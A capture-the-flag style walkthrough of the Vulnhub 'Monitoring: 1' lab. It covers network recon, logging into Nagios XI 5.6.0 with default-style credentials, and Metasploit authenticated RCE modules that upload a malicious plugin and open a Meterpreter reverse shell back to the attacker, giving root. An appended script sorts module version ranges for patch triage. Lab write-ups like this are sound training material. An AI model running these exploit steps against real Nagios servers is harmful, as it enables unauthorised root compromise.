Vulnhub: Detailed Walkthrough of the Monitoring Target Machine

Monitoring

Author: jason_huawen

Target Host Basic Information

Name: Monitoring: 1

URL:

https://www.vulnhub.com/entry/monitoring-1,555/

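Identifying the Target Host's IP Address

The target host cannot obtain an IP address automatically from VirtualBox; this must first be fixed by following my other article on the subject.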

─(kali㉿kali)-[~/Vulnhub/Monitoring]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.61.0/16   |   Screen View: Unique Hosts                                                         
                                                                                                                             
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                             
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:0a      1      60  Unknown vendor                                                            
 192.168.56.100  08:00:27:27:23:f6      1      60  PCS Systemtechnik GmbH                                                    
 192.168.56.229  08:00:27:44:6e:34      1      60  PCS Systemtechnik GmbH   

Using the netdiscover tool that ships with Kali Linux, the target host's IP address is identified as 192.168.56.229.

NMAP Scan

──(kali㉿kali)-[~/Vulnhub/Monitoring]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.229 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-27 08:27 EST
Nmap scan report for localhost (192.168.56.229)
Host is up (0.00022s latency).
Not shown: 65529 closed tcp ports (reset)
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 b8:8c:40:f6:5f:2a:8b:f7:92:a8:81:4b:bb:59:6d:02 (RSA)
|   256 e7:bb:11:c1:2e:cd:39:91:68:4e:aa:01:f6:de:e6:19 (ECDSA)
|_  256 0f:8e:28:a7:b7:1d:60:bf:a6:2b:dd:a3:6d:d1:4e:a4 (ED25519)
25/tcp   open  smtp       Postfix smtpd
|_smtp-commands: ubuntu, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN
| ssl-cert: Subject: commonName=ubuntu
| Not valid before: 2020-09-08T17:59:00
|_Not valid after:  2030-09-06T17:59:00
|_ssl-date: TLS randomness does not represent time
80/tcp   open  http       Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Nagios XI
|_http-server-header: Apache/2.4.18 (Ubuntu)
389/tcp  open  ldap       OpenLDAP 2.2.X - 2.3.X
443/tcp  open  ssl/http   Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Nagios XI
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
|_http-server-header: Apache/2.4.18 (Ubuntu)
| ssl-cert: Subject: commonName=192.168.1.6/organizationName=Nagios Enterprises/stateOrProvinceName=Minnesota/countryName=US
| Not valid before: 2020-09-08T18:28:08
|_Not valid after:  2030-09-06T18:28:08
5667/tcp open  tcpwrapped
MAC Address: 08:00:27:44:6E:34 (Oracle VirtualBox virtual NIC)
Service Info: Host:  ubuntu; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.45 seconds

The NMAP scan results show that the target host has 6 open ports.

Get Access

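A quick look at ports 80 and 443 shows that both run the same service.

A web search shows that the default nagios administrator account is nagiosadmin, with the password PASSW0RD.

However, that password does not work; the password is admin instead.

Username: nagiosadmin

Password: admin

This username and password can be used to log in to both /nagios and nagiosxi.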

┌──(kali㉿kali)-[~/Vulnhub/Monitoring]
└─$ searchsploit nagios           
-------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                              |  Path
-------------------------------------------------------------------------------------------- ---------------------------------
Nagios 3.0.6 - 'statuswml.cgi' Arbitrary Shell Command Injection                            | cgi/remote/33051.txt
Nagios 3.2.3 - 'expand' Cross-Site Scripting                                                | multiple/remote/35818.txt
Nagios 4.2.2 - Local Privilege Escalation                                                   | linux/local/40774.sh
Nagios < 4.2.2 - Arbitrary Code Execution                                                   | linux/remote/40920.py
Nagios < 4.2.4 - Local Privilege Escalation                                                 | linux/local/40921.sh
Nagios Core 4.4.1 - Denial of Service                                                       | linux/dos/45082.txt
Nagios Incident Manager 2.0.0 - Multiple Vulnerabilities                                    | php/webapps/40252.txt
Nagios Log Server 1.4.1 - Multiple Vulnerabilities                                          | php/webapps/40250.txt
Nagios Log Server 2.1.6 - Persistent Cross-Site Scripting                                   | multiple/webapps/48772.txt
Nagios Log Server 2.1.7 - Persistent Cross-Site Scripting                                   | multiple/webapps/49082.txt
Nagios Network Analyzer 2.2.0 - Multiple Vulnerabilities                                    | php/webapps/40251.txt
Nagios Network Analyzer 2.2.1 - Multiple Cross-Site Request Forgery Vulnerabilities         | php/webapps/40221.txt
Nagios Plugins 1.4.2/1.4.9 - Location Header Remote Buffer Overflow                         | linux/dos/30646.txt
Nagios Plugins check_dhcp 2.0.1 - Arbitrary Option File Read                                | linux/local/33387.txt
Nagios Plugins check_dhcp 2.0.2 - Arbitrary Option File Read Race Condition                 | linux/local/33904.txt
Nagios Plugins check_ups - Local Buffer Overflow (PoC)                                      | linux/dos/18278.txt
Nagios Remote Plugin Executor - Arbitrary Command Execution (Metasploit)                    | linux/remote/24955.rb
Nagios XI - 'login.php' Multiple Cross-Site Scripting Vulnerabilities                       | linux/remote/34507.txt
Nagios XI - 'tfPassword' SQL Injection                                                      | php/remote/38827.txt
Nagios XI - 'users.php' SQL Injection                                                       | multiple/remote/34523.txt
Nagios XI - Authenticated Remote Command Execution (Metasploit)                             | linux/remote/48191.rb
Nagios XI - Multiple Cross-Site Request Forgery Vulnerabilities                             | linux/remote/34431.html
Nagios XI - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities                  | multiple/remote/36455.txt
Nagios XI 5.2.6 < 5.2.9 / 5.3 / 5.4 - Chained Remote Root                                   | php/webapps/44560.py
Nagios XI 5.2.6-5.4.12 - Chained Remote Code Execution (Metasploit)                         | linux/remote/44969.rb
Nagios XI 5.2.7 - Multiple Vulnerabilities                                                  | php/webapps/39899.txt
Nagios XI 5.5.6 - Magpie_debug.php Root Remote Code Execution (Metasploit)                  | linux/remote/47039.rb
Nagios XI 5.5.6 - Remote Code Execution / Privilege Escalation                              | linux/webapps/46221.py
Nagios XI 5.6.1 - SQL injection                                                             | php/webapps/46910.txt
Nagios XI 5.6.12 - 'export-rrd.php' Remote Code Execution                                   | php/webapps/48640.txt
Nagios XI 5.6.5 - Remote Code Execution / Root Privilege Escalation                         | php/webapps/47299.php
Nagios XI 5.7.3 - 'Contact Templates' Persistent Cross-Site Scripting                       | php/webapps/48893.txt
Nagios XI 5.7.3 - 'Manage Users' Authenticated SQL Injection                                | php/webapps/48894.txt
Nagios XI 5.7.3 - 'mibs.php' Remote Command Injection (Authenticated)                       | php/webapps/48959.py
Nagios XI 5.7.3 - 'SNMP Trap Interface' Authenticated SQL Injection                         | php/webapps/48895.txt
Nagios XI 5.7.5 - Multiple Persistent Cross-Site Scripting                                  | php/webapps/49449.txt
Nagios XI 5.7.X - Remote Code Execution RCE (Authenticated)                                 | php/webapps/49422.py
Nagios XI Chained - Remote Code Execution (Metasploit)                                      | linux/remote/40067.rb
Nagios XI Network Monitor Graph Explorer Component - Command Injection (Metasploit)         | unix/remote/23227.rb
Nagios3 - 'history.cgi' Host Command Execution (Metasploit)                                 | linux/remote/24159.rb
Nagios3 - 'history.cgi' Remote Command Execution                                            | multiple/remote/24084.py
Nagios3 - 'statuswml.cgi' 'Ping' Command Execution (Metasploit)                             | cgi/webapps/16908.rb
Nagios3 - 'statuswml.cgi' Command Injection (Metasploit)                                    | unix/webapps/9861.rb
NagiosQL 2005 2.00 - 'prepend_adm.php' Remote File Inclusion                                | php/webapps/3919.txt
PHPNagios 1.2.0 - 'menu.php' Local File Inclusion                                           | php/webapps/9611.txt
-------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

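We need to know the Nagios XI version; after logging in to Nagios XI, the version is shown as Nagios XI 5.6.0.

A web search also shows that version 5.6.0 has a remote code execution vulnerability: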

https://www.rapid7.com/db/modules/exploit/linux/http/nagios_xi_mibs_authenticated_rce/
msf > use exploit/linux/http/nagios_xi_mibs_authenticated_rce
msf exploit(nagios_xi_mibs_authenticated_rce) > show targets
    ...targets...
msf exploit(nagios_xi_mibs_authenticated_rce) > set TARGET < target-id >
msf exploit(nagios_xi_mibs_authenticated_rce) > show options
    ...show and set options...
msf exploit(nagios_xi_mibs_authenticated_rce) > exploit
msf6 > use exploit/linux/http/nagios_xi_mibs_authenticated_rce
[*] Using configured payload linux/x86/meterpreter/reverse_tcp
msf6 exploit(linux/http/nagios_xi_mibs_authenticated_rce) > show options 

Module options (exploit/linux/http/nagios_xi_mibs_authenticated_rce):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   FINISH_INSTALL  false            no        If the Nagios XI installation has not been completed, try to do so. This inclu
                                              des signing the license agreement.
   PASSWORD                         yes       Password to authenticate with
   Proxies                          no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                           yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Us
                                              ing-Metasploit
   RPORT           80               yes       The target port (TCP)
   SRVHOST         0.0.0.0          yes       The local host or network interface to listen on. This must be an address on t
                                              he local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT         8080             yes       The local port to listen on.
   SSL             false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                          no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI       /nagiosxi/       yes       The base path to the Nagios XI application
   URIPATH                          no        The URI to use for this exploit (default is random)
   USERNAME        nagiosadmin      yes       Username to authenticate with
   VHOST                            no        HTTP server virtual host


Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Linux (x86/x64)


msf6 exploit(linux/http/nagios_xi_mibs_authenticated_rce) > set LHOST 192.168.56.206
LHOST => 192.168.56.206
msf6 exploit(linux/http/nagios_xi_mibs_authenticated_rce) > set LPORT 5555
LPORT => 5555
msf6 exploit(linux/http/nagios_xi_mibs_authenticated_rce) > set RHOSTS  192.168.56.229
RHOSTS => 192.168.56.229
msf6 exploit(linux/http/nagios_xi_mibs_authenticated_rce) > set SRVHOST 192.168.56.229
SRVHOST => 192.168.56.229
msf6 exploit(linux/http/nagios_xi_mibs_authenticated_rce) > set PASSWORD  admin
PASSWORD => admin
msf6 exploit(linux/http/nagios_xi_mibs_authenticated_rce) > set USERNAME nagiosadmin
USERNAME => nagiosadmin
msf6 exploit(linux/http/nagios_xi_mibs_authenticated_rce) > exploit

[*] Started reverse TCP handler on 192.168.56.206:5555 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Attempting to authenticate to Nagios XI...
[+] Successfully authenticated to Nagios XI
[*] Target is Nagios XI with version 5.6.0
[+] The target appears to be vulnerable.
[*] Command Stager progress - 100.00% done (773/773 bytes)
[*] Exploit completed, but no session was created.
msf6 exploit(linux/http/nagios_xi_mibs_authenticated_rce) > show options 

Module options (exploit/linux/http/nagios_xi_mibs_authenticated_rce):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   FINISH_INSTALL  false            no        If the Nagios XI installation has not been completed, try to do so. This inclu
                                              des signing the license agreement.
   PASSWORD        admin            yes       Password to authenticate with
   Proxies                          no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS          192.168.56.229   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Us
                                              ing-Metasploit
   RPORT           80               yes       The target port (TCP)
   SRVHOST         192.168.56.229   yes       The local host or network interface to listen on. This must be an address on t
                                              he local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT         8080             yes       The local port to listen on.
   SSL             false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                          no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI       /nagiosxi/       yes       The base path to the Nagios XI application
   URIPATH                          no        The URI to use for this exploit (default is random)
   USERNAME        nagiosadmin      yes       Username to authenticate with
   VHOST                            no        HTTP server virtual host


Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.56.206   yes       The listen address (an interface may be specified)
   LPORT  5555             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Linux (x86/x64)


msf6 exploit(linux/http/nagios_xi_mibs_authenticated_rce) > set SRVHOST 192.168.56.206
SRVHOST => 192.168.56.206
msf6 exploit(linux/http/nagios_xi_mibs_authenticated_rce) > show options 

Module options (exploit/linux/http/nagios_xi_mibs_authenticated_rce):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   FINISH_INSTALL  false            no        If the Nagios XI installation has not been completed, try to do so. This inclu
                                              des signing the license agreement.
   PASSWORD        admin            yes       Password to authenticate with
   Proxies                          no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS          192.168.56.229   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Us
                                              ing-Metasploit
   RPORT           80               yes       The target port (TCP)
   SRVHOST         192.168.56.206   yes       The local host or network interface to listen on. This must be an address on t
                                              he local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT         8080             yes       The local port to listen on.
   SSL             false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                          no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI       /nagiosxi/       yes       The base path to the Nagios XI application
   URIPATH                          no        The URI to use for this exploit (default is random)
   USERNAME        nagiosadmin      yes       Username to authenticate with
   VHOST                            no        HTTP server virtual host


Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.56.206   yes       The listen address (an interface may be specified)
   LPORT  5555             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Linux (x86/x64)


msf6 exploit(linux/http/nagios_xi_mibs_authenticated_rce) > exploit 

[*] Started reverse TCP handler on 192.168.56.206:5555 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Attempting to authenticate to Nagios XI...
[+] Successfully authenticated to Nagios XI
[*] Target is Nagios XI with version 5.6.0
[+] The target appears to be vulnerable.
[*] Command Stager progress - 100.00% done (773/773 bytes)
[*] Exploit completed, but no session was created.

Strangely, no shell was obtained, so a different module is needed:

msf6 exploit(linux/http/nagios_xi_mibs_authenticated_rce) > search nagios

Matching Modules
================

   #   Name                                                                 Disclosure Date  Rank       Check  Description
   -   ----                                                                 ---------------  ----       -----  -----------
   0   exploit/linux/misc/nagios_nrpe_arguments                             2013-02-21       excellent  Yes    Nagios Remote Plugin Executor Arbitrary Command Execution
   1   exploit/linux/http/nagios_xi_snmptrap_authenticated_rce              2020-10-20       excellent  Yes    Nagios XI 5.5.0-5.7.3 - Snmptrap Authenticated Remote Code Exection
   2   exploit/linux/http/nagios_xi_mibs_authenticated_rce                  2020-10-20       excellent  Yes    Nagios XI 5.6.0-5.7.3 - Mibs.php Authenticated Remote Code Exection
   3   exploit/linux/http/nagios_xi_autodiscovery_webshell                  2021-07-15       excellent  Yes    Nagios XI Autodiscovery Webshell Upload
   4   exploit/linux/http/nagios_xi_chained_rce                             2016-03-06       excellent  Yes    Nagios XI Chained Remote Code Execution
   5   exploit/linux/http/nagios_xi_chained_rce_2_electric_boogaloo         2018-04-17       manual     Yes    Nagios XI Chained Remote Code Execution
   6   post/linux/gather/enum_nagios_xi                                     2018-04-17       normal     No     Nagios XI Enumeration
   7   exploit/linux/http/nagios_xi_magpie_debug                            2018-11-14       excellent  Yes    Nagios XI Magpie_debug.php Root Remote Code Execution
   8   exploit/unix/webapp/nagios_graph_explorer                            2012-11-30       excellent  Yes    Nagios XI Network Monitor Graph Explorer Component Command Injection
   9   exploit/linux/http/nagios_xi_plugins_check_plugin_authenticated_rce  2019-07-29       excellent  Yes    Nagios XI Prior to 5.6.6 getprofile.sh Authenticated Remote Command Execution
   10  exploit/linux/http/nagios_xi_plugins_filename_authenticated_rce      2020-12-19       excellent  Yes    Nagios XI Prior to 5.8.0 - Plugins Filename Authenticated Remote Code Exection
   11  auxiliary/scanner/http/nagios_xi_scanner                                              normal     No     Nagios XI Scanner
   12  exploit/unix/webapp/nagios3_history_cgi                              2012-12-09       great      Yes    Nagios3 history.cgi Host Command Execution
   13  exploit/unix/webapp/nagios3_statuswml_ping                           2009-06-22       excellent  No     Nagios3 statuswml.cgi Ping Command Execution


Interact with a module by name or index. For example info 13, use 13 or use exploit/unix/webapp/nagios3_statuswml_ping

msf6 exploit(linux/http/nagios_xi_mibs_authenticated_rce) > use exploit/linux/http/nagios_xi_plugins_check_plugin_authenticated_rce
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/http/nagios_xi_plugins_check_plugin_authenticated_rce) > show options 

Module options (exploit/linux/http/nagios_xi_plugins_check_plugin_authenticated_rce):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   FINISH_INSTALL  false            no        If the Nagios XI installation has not been completed, try to do so. This inclu
                                              des signing the license agreement.
   PASSWORD                         yes       Password to authenticate with
   Proxies                          no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                           yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Us
                                              ing-Metasploit
   RPORT           80               yes       The target port (TCP)
   SRVHOST         0.0.0.0          yes       The local host or network interface to listen on. This must be an address on t
                                              he local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT         8080             yes       The local port to listen on.
   SSL             false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                          no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI       /nagiosxi/       yes       The base path to the Nagios XI application
   URIPATH                          no        The URI to use for this exploit (default is random)
   USERNAME        nagiosadmin      yes       Username to authenticate with
   VHOST                            no        HTTP server virtual host


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Linux (x64)


msf6 exploit(linux/http/nagios_xi_plugins_check_plugin_authenticated_rce) > set LHOST 192.168.56.206
LHOST => 192.168.56.206
msf6 exploit(linux/http/nagios_xi_plugins_check_plugin_authenticated_rce) > set LPORT 5555
LPORT => 5555
msf6 exploit(linux/http/nagios_xi_plugins_check_plugin_authenticated_rce) > set SRVHOST 192.168.56.206
SRVHOST => 192.168.56.206
msf6 exploit(linux/http/nagios_xi_plugins_check_plugin_authenticated_rce) > set PASSWORD admin
PASSWORD => admin
msf6 exploit(linux/http/nagios_xi_plugins_check_plugin_authenticated_rce) > exploit

[-] Msf::OptionValidateError The following options failed to validate: RHOSTS
msf6 exploit(linux/http/nagios_xi_plugins_check_plugin_authenticated_rce) > set RHOSTS 192.168.56.229
RHOSTS => 192.168.56.229
msf6 exploit(linux/http/nagios_xi_plugins_check_plugin_authenticated_rce) > exploit

[*] Started reverse TCP handler on 192.168.56.206:5555 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Attempting to authenticate to Nagios XI...
[+] Successfully authenticated to Nagios XI
[*] Target is Nagios XI with version 5.6.0
[+] The target appears to be vulnerable.
[*] Uploading malicious 'check_ping' plugin...
[*] Command Stager progress - 100.00% done (897/897 bytes)
[+] Successfully uploaded plugin.
[*] Executing plugin...
[*] Waiting up to 300 seconds for the plugin to request the final payload...
[*] Sending stage (3020772 bytes) to 192.168.56.229
[*] Meterpreter session 1 opened (192.168.56.206:5555 -> 192.168.56.229:38400) at 2022-11-27 09:12:09 -0500
[*] Deleting malicious 'check_ping' plugin...
[+] Plugin deleted.

A shell was obtained successfully.

meterpreter > shell
Process 17181 created.
Channel 1 created.
id
uid=0(root) gid=0(root) groups=0(root)
cd /root
ls -alh
total 48K
drwx------  7 root root 4.0K Sep  8  2020 .
drwxr-xr-x 23 root root 4.0K Sep  8  2020 ..
-rw-------  1 root root  407 Sep  8  2020 .bash_history
-rw-r--r--  1 root root 3.1K Oct 22  2015 .bashrc
drwxr-xr-x  6 root root 4.0K Sep  8  2020 .cpan
drwx------  2 root root 4.0K Sep  8  2020 .gnupg
drwxr-xr-x  2 root root 4.0K Sep  8  2020 .nano
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rw-------  1 root root 1.0K Sep  8  2020 .rnd
drwxr-xr-x  3 root root 4.0K Sep  8  2020 .subversion
-rw-r--r--  1 root root   47 Sep  8  2020 proof.txt
drwxr-xr-x  2 root root 4.0K Sep  8  2020 scripts
which python
/usr/bin/python
python -c 'import pty;pty.spawn("/bin/bash")'
root@ubuntu:~# cat proof.txt
cat proof.txt
SunCSR.Team.3.af6d45da1f1181347b9e2139f23c6a5b
root@ubuntu:~# 

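The shell obtained is a root shell right away.

Lessons Learned

  1. My first instinct was right: nagios has a default username and password. But I gave up after logging in with that username and password failed, when I should have kept going; the username tends to stay at its default, while the password can be found by cracking, for example with burpsuite.

  2. Although a Metasploit exploit module matching the version was found online, it failed to obtain a shell; in that situation, try the other related modules.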
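
The second lesson also reads as a patching question: which of the version ranges advertised in the `search nagios` output cover the installed Nagios XI 5.6.0, and which version falls outside all of them. The following is an added example, not part of the original write-up; it parses only the description strings copied from that output, and the function names are hypothetical. The ranges are what the module descriptions state, not vendor advisory data.

```python
import re

# Description strings copied from the `search nagios` output above
# (module name, description). Spellings such as "Exection" are the tool's own.
MODULES = [
    ("nagios_xi_snmptrap_authenticated_rce",
     "Nagios XI 5.5.0-5.7.3 - Snmptrap Authenticated Remote Code Exection"),
    ("nagios_xi_mibs_authenticated_rce",
     "Nagios XI 5.6.0-5.7.3 - Mibs.php Authenticated Remote Code Exection"),
    ("nagios_xi_plugins_check_plugin_authenticated_rce",
     "Nagios XI Prior to 5.6.6 getprofile.sh Authenticated Remote Command Execution"),
    ("nagios_xi_plugins_filename_authenticated_rce",
     "Nagios XI Prior to 5.8.0 - Plugins Filename Authenticated Remote Code Exection"),
    ("nagios_xi_magpie_debug",
     "Nagios XI Magpie_debug.php Root Remote Code Execution"),
]

VER = r"(\d+(?:\.\d+)+)"
RANGE_RE = re.compile(VER + r"\s*-\s*" + VER)       # "5.6.0-5.7.3"
PRIOR_RE = re.compile(r"[Pp]rior to\s+" + VER)      # "Prior to 5.6.6"


def parse_version(text, width=4):
    """'5.6.0' -> (5, 6, 0, 0); zero padding makes '5.6' equal to '5.6.0'."""
    parts = [int(p) for p in text.split(".")]
    return tuple(parts + [0] * (width - len(parts)))


def affected_range(description):
    """Return (low, high, high_is_inclusive), or None if no range is stated."""
    m = RANGE_RE.search(description)
    if m:
        return parse_version(m.group(1)), parse_version(m.group(2)), True
    m = PRIOR_RE.search(description)
    if m:
        return parse_version("0"), parse_version(m.group(1)), False
    return None


def triage(installed, modules=MODULES):
    """Split modules into those whose stated range covers `installed`
    and those that state no range (these need a manual advisory check)."""
    version = parse_version(installed)
    covered, unstated = [], []
    for name, description in modules:
        rng = affected_range(description)
        if rng is None:
            unstated.append(name)
            continue
        low, high, inclusive = rng
        if low <= version and (version <= high if inclusive else version < high):
            covered.append(name)
    return covered, unstated


def clear_bound(modules=MODULES):
    """Lowest version constraint that lies outside every stated range."""
    ranges = [r for r in (affected_range(d) for _, d in modules) if r]
    if not ranges:
        return None
    # The highest upper bound is the binding one; inclusive beats exclusive.
    _, high, inclusive = max(ranges, key=lambda r: (r[1], r[2]))
    parts = list(high)
    while len(parts) > 3 and parts[-1] == 0:
        parts.pop()                      # drop the comparison padding
    return (">" if inclusive else ">=") + " " + ".".join(map(str, parts))


if __name__ == "__main__":
    covered, unstated = triage("5.6.0")
    print("stated ranges covering 5.6.0:", covered)
    print("no range stated, check advisory:", unstated)
    print("version outside all stated ranges:", clear_bound())
```
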

posted @ 2022-11-27 22:39  Jason_huawen